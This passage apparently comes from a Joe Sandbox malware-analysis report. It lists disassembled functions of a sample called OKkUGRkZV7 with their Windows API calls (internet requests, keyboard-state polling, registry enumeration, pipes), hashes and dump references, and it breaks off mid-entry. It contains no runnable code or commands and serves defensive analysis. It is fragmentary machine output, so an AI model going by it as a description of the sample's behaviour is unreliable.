                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: f160113c850f5928b07de30967e08ad1dd7551c73170c52fc3ce47035c8b11f6
                                              • Instruction ID: 7b22dde29d72cf66eed6d8e46641c0f85c262d2adbffedcde6e8cf6f783dbc96
                                              • Opcode Fuzzy Hash: f160113c850f5928b07de30967e08ad1dd7551c73170c52fc3ce47035c8b11f6
                                              • Instruction Fuzzy Hash: A241AE702043019FDB22DF29C844F1BBBE8EF86314F05492DF9A59B291DB34E905CB52
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003BD7C5
                                                • Part of subcall function 0034784B: _memmove.LIBCMT ref: 00347899
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
                                              • Opcode ID: 377f57c627c5103079115c3b5d075b35cd524d6ec01a5d107930107dc968dfba
                                              • Instruction ID: cd7e0d907dbb8505f1620c81506c4708d8e696ecd626028f6e33610189a6cbfe
                                              • Opcode Fuzzy Hash: 377f57c627c5103079115c3b5d075b35cd524d6ec01a5d107930107dc968dfba
                                              • Instruction Fuzzy Hash: 7F31B071904619AFCF06EF54CC519FEB3B5FF04324B10862AE965DBAD1EB31A905CB80
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00398F14
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00398F27
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00398F57
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 365058703-1403004172
                                              • Opcode ID: 0a74cc2618a65320fa086e911a2e3bd60427a5b1d2da1cda1d0f05a061c967a7
                                              • Instruction ID: 2071cddba539fac6d94faab47d53f16dedd2bc0111a07d1b75118ca5f0b37c58
                                              • Opcode Fuzzy Hash: 0a74cc2618a65320fa086e911a2e3bd60427a5b1d2da1cda1d0f05a061c967a7
                                              • Instruction Fuzzy Hash: A821F272A04104BFDF16ABA0DC46DFFB7A9DF46360F004519F4229B2E1DB3958099610
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003B184C
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B1872
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003B18A2
                                              • InternetCloseHandle.WININET(00000000), ref: 003B18E9
                                                • Part of subcall function 003B2483: GetLastError.KERNEL32(?,?,003B1817,00000000,00000000,00000001), ref: 003B2498
                                                • Part of subcall function 003B2483: SetEvent.KERNEL32(?,?,003B1817,00000000,00000000,00000001), ref: 003B24AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: 5cdf462af932d0ed1c201d721a592effc2c10669b3772e0fb176024175f35877
                                              • Instruction ID: 8bc697013161d6097a4e1d6d95a4cd22beb52239d4ec898395236e18fbb500e3
                                              • Opcode Fuzzy Hash: 5cdf462af932d0ed1c201d721a592effc2c10669b3772e0fb176024175f35877
                                              • Instruction Fuzzy Hash: 4E2180B2500208BFEB129F65DC95EFB77EDFB48748F10412AFA05E6940DB219E0557A1
                                              APIs
                                                • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003C6461
                                              • LoadLibraryW.KERNEL32(?), ref: 003C6468
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003C647D
                                              • DestroyWindow.USER32(?), ref: 003C6485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: 31cecca665f09aa99ee9c4e8f7f493d10d86e98a1dbf8744027d24f42821afd8
                                              • Instruction ID: 9574cffaf37bb988e6d7db5d0b4a0654b50d64bf065f4cb954715e9138d74d33
                                              • Opcode Fuzzy Hash: 31cecca665f09aa99ee9c4e8f7f493d10d86e98a1dbf8744027d24f42821afd8
                                              • Instruction Fuzzy Hash: 48217972200205AFEF168F65DC82FBA37ADEF59328F114629FA10D61A0D631AC51A760
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 003A6DBC
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A6DEF
                                              • GetStdHandle.KERNEL32(0000000C), ref: 003A6E01
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003A6E3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: fcce2bb171d9fff67ed5f250f0286547538daaf14a46b000d23cf1ae71c92ef3
                                              • Instruction ID: b316f55a41ea991063d5a38d040f5c3aaa33687f0e1cc9128331e005232363d8
                                              • Opcode Fuzzy Hash: fcce2bb171d9fff67ed5f250f0286547538daaf14a46b000d23cf1ae71c92ef3
                                              • Instruction Fuzzy Hash: B5219274600209EFDB229F39DC06E9AB7F8EF46760F244A19FDA1D72D0D77099508B50
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 003A6E89
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A6EBB
                                              • GetStdHandle.KERNEL32(000000F6), ref: 003A6ECC
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003A6F06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: 5b7b46a912329500d73b10850eb926dd3eab1f6dc9c9aa662d03a55be030e5dd
                                              • Instruction ID: 9c3f8da36a0073aaa088bb4a1a4217de8ea173968173c1476acc0143205b5223
                                              • Opcode Fuzzy Hash: 5b7b46a912329500d73b10850eb926dd3eab1f6dc9c9aa662d03a55be030e5dd
                                              • Instruction Fuzzy Hash: A821A479500305AFDB229F69DD06E9AB7A8EF46730F280A19FDE0D72D0D770A850C750
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 003AAC54
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003AACA8
                                              • __swprintf.LIBCMT ref: 003AACC1
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,003CF910), ref: 003AACFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: d1eec44d99acd6ed73c4e4531df720adf28f39a8952c1a7304985605ce9fa7a1
                                              • Instruction ID: 162aa7e96f0debec0eabcb79561e3378122a9896b02fd65a61414e3febb56250
                                              • Opcode Fuzzy Hash: d1eec44d99acd6ed73c4e4531df720adf28f39a8952c1a7304985605ce9fa7a1
                                              • Instruction Fuzzy Hash: 25214135A00109AFCB11DF65C945EEFBBB8EF49714B004469F909DF252DB31EA41DB61
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0039FCED,?,003A0D40,?,00008000), ref: 003A115F
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0039FCED,?,003A0D40,?,00008000), ref: 003A1184
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0039FCED,?,003A0D40,?,00008000), ref: 003A118E
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,0039FCED,?,003A0D40,?,00008000), ref: 003A11C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID: @:
                                              • API String ID: 2875609808-4235850541
                                              • Opcode ID: 5d40fa137e91f4376e7ff9590863a7f710b54b9a7ed321da96f466982c3eed2f
                                              • Instruction ID: bdecc42890626f5b9540278b55fdb693c303f80ff36d5e0591980b51e0cd81eb
                                              • Opcode Fuzzy Hash: 5d40fa137e91f4376e7ff9590863a7f710b54b9a7ed321da96f466982c3eed2f
                                              • Instruction Fuzzy Hash: 1B113C35D0051DDBCF029FA5D849AEEBBBCFF0A711F054056EA81B6240CB70A550CB95
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 003A1B19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: 74efa7a6ca4d179e7e712f6d85371edfb40118cb34b8a05bc6636aead18ddd8c
                                              • Instruction ID: 487affc8532d210c6f7d49586e62e1d258df26b9f12334ee6fa775262d0a9d6b
                                              • Opcode Fuzzy Hash: 74efa7a6ca4d179e7e712f6d85371edfb40118cb34b8a05bc6636aead18ddd8c
                                              • Instruction Fuzzy Hash: C31161759101088FCF06EF94D8528FEB7B5FF26304F108465D864AB6A2EB326D06DB50
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BEC07
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BEC37
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003BED6A
                                              • CloseHandle.KERNEL32(?), ref: 003BEDEB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: 42a21c7079fb16ad2d0dc5745126f589c56840367f2a27f2678289a7f8175731
                                              • Instruction ID: 254f07207cb2eb17df0dc32f1f8ac16fd5404933470b178df083d2578e37327b
                                              • Opcode Fuzzy Hash: 42a21c7079fb16ad2d0dc5745126f589c56840367f2a27f2678289a7f8175731
                                              • Instruction Fuzzy Hash: A48161716043009FD762EF28C886F6AB7E5AF48714F04881DF999DF692D7B1AC40CB91
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 003C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFDAD,?,?), ref: 003C0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C00FD
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C013C
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003C0183
                                              • RegCloseKey.ADVAPI32(?,?), ref: 003C01AF
                                              • RegCloseKey.ADVAPI32(00000000), ref: 003C01BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: 6748ebc177dcac7acc0384a85ec566d7e2c2f21dd7b6c375da1cc424aa669f2b
                                              • Instruction ID: 26d0f9b68890bea5070d157b8fdd494f7506204a45866bce7e6387865ee0bec4
                                              • Opcode Fuzzy Hash: 6748ebc177dcac7acc0384a85ec566d7e2c2f21dd7b6c375da1cc424aa669f2b
                                              • Instruction Fuzzy Hash: 0F512871208244AFD716EF58C881F6AB7E9AF84714F44892DF5958B2A2DB31ED04CB52
                                              APIs
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003BD927
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 003BD9AA
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 003BD9C6
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 003BDA07
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003BDA21
                                                • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A7896,?,?,00000000), ref: 00345A2C
                                                • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A7896,?,?,00000000,?,?), ref: 00345A50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                              • String ID:
                                              • API String ID: 327935632-0
                                              • Opcode ID: 162da61e8dbf40651d3f4804d262f1ed16f937ec514fb315b6de08fc170b69e1
                                              • Instruction ID: 9d05be4531f74492fbf7d3bb312983bdcd9254ec9c824b27ef81647a3e3452ae
                                              • Opcode Fuzzy Hash: 162da61e8dbf40651d3f4804d262f1ed16f937ec514fb315b6de08fc170b69e1
                                              • Instruction Fuzzy Hash: 43510635A00209DFCB02EFA8C4849ADB7F9FF09324B158165E959AB712E731AE45CF91
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003AE61F
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003AE648
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003AE687
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003AE6AC
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003AE6B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: ec944c4702fd375ca572bf47d7e5167d83fef170c431b23d6d5b6a4cb479c45b
                                              • Instruction ID: 963834206c37697a3abe01c3b333e37354bceb65df6b5a4e0faba485e5807499
                                              • Opcode Fuzzy Hash: ec944c4702fd375ca572bf47d7e5167d83fef170c431b23d6d5b6a4cb479c45b
                                              • Instruction Fuzzy Hash: 5251E935A00205DFCB16EF64C985AAEBBF5EF49314F1484A9E819AF362CB31ED11DB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f54fa6b466295744a11560565aabc86ab721187a08e79ec82a6272e215e70c2b
                                              • Instruction ID: 2d15fcdb67f0899445780538afdfb3c9ad7da964c2459625706d990d30927067
                                              • Opcode Fuzzy Hash: f54fa6b466295744a11560565aabc86ab721187a08e79ec82a6272e215e70c2b
                                              • Instruction Fuzzy Hash: 1C412B3590491CAFD712DF34CC48FA9BBA9EB09354F1A4169F916E72E0CB30AD41DB51
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00342357
                                              • ScreenToClient.USER32(004057B0,?), ref: 00342374
                                              • GetAsyncKeyState.USER32(00000001), ref: 00342399
                                              • GetAsyncKeyState.USER32(00000002), ref: 003423A7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: 843e141c87c986bcfb8a5d02c30484089b90eb374ae77894d82c6e5654f4abdd
                                              • Instruction ID: 5594e0a09d68c5e2775e65d64bca1ab41a33b7e3f07fa87682e43affb14a5620
                                              • Opcode Fuzzy Hash: 843e141c87c986bcfb8a5d02c30484089b90eb374ae77894d82c6e5654f4abdd
                                              • Instruction Fuzzy Hash: F5415339604119FFDF269F68C844BEABBB5FB05360F50435AF829AA190C734AD90DF91
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003963E7
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00396433
                                              • TranslateMessage.USER32(?), ref: 0039645C
                                              • DispatchMessageW.USER32(?), ref: 00396466
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00396475
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
